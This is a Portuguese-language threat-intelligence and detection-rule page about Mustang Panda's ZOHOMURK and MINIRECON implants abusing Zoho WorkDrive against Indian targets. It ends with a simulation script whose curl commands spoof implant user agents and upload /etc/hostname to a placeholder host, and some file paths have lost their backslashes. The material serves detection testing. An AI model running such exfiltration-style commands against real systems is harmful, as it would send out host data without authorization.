SOC Prime Bias: Alto

06 Jul 2026 21:57 UTC

Mustang Panda Usa ZOHOMURK e MINIRECON contra os Setores Governamental e de Energia da Índia

Author Photo
SOC Prime Team linkedin icon Seguir
Mustang Panda Usa ZOHOMURK e MINIRECON contra os Setores Governamental e de Energia da Índia
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Mustang Panda está realizando operações de espionagem visando os setores do governo e de hidrelétrica da Índia. O grupo está usando um kit de ferramentas de malware atualizado que inclui SHARDLOADER, MINIRECON e ZOHOMURK. Uma de suas técnicas notáveis é o abuso do Zoho WorkDrive para comando e controle e exfiltração de dados.

Investigação

A Acronis TRU identificou duas campanhas paralelas que usaram iscas de spear-phishing temáticas sobre a cooperação Índia-Taiwan. Os pesquisadores encontraram carregamento de DLL através de binários legítimos do Solid PDF Creator e analisaram os novos implantes ZOHOMURK e MINIRECON. A investigação também foi conduzida em coordenação com o CERT-In para apoiar ações defensivas.

Mitigação

As organizações devem monitorar atividades incomuns envolvendo plataformas de nuvem, especialmente o uso não autorizado do Zoho WorkDrive. As soluções EDR e XDR devem ser ajustadas para detectar carregamento de DLL e persistência suspeita baseada em registro. Visibilidade em processos não navegadores fazendo conexões HTTPS ou WebSocket para serviços de nuvem também é essencial.

Resposta

Se essa atividade for detectada, os sistemas afetados devem ser isolados imediatamente para interromper mais exfiltração por meio das APIs da nuvem. Os investigadores devem realizar análise forense nos caminhos de estágio, como C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. As chaves de execução de registro e as tarefas agendadas devem ser analisadas quanto a persistência não autorizada.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico errado.

  • Narrativa do Ataque & Comandos: O adversário estabeleceu com sucesso um ponto de apoio e está tentando iniciar comunicações de Comando e Controle (C2). Para se fazer passar por tráfego comercial legítimo, o implante ZOHOMURK tenta se comunicar com seu controlador imitando chamadas de API do Zoho WorkDrive. O atacante usa uma string de User-Agent específica, hardcoded (Zoho Client/1.0) para passar por certos filtros de rede, na esperança de se misturar com o tráfego legítimo de produtividade em nuvem. Esta ação gerará uma entrada de log de proxy contendo o User-Agent alvo, acionando assim a regra de detecção.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Simulação de C2 ZOHOMURK via falsificação de User-Agent
    # Alvo 1: Imitando cliente Zoho
    echo "[+] Simulando ZOHOMURK: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Alvo 2: Imitando IPFetcher
    echo "[+] Simulando ZOHOMURK: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Alvo 3: Imitando Multipart POST User-Agent
    echo "[+] Simulando ZOHOMURK: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Comandos de Limpeza:

    # Nenhum artefato persistente é criado no sistema por esta simulação baseada em rede.
    # Apenas assegure-se de que nenhum processo curl em segundo plano esteja em execução.
    pkill curl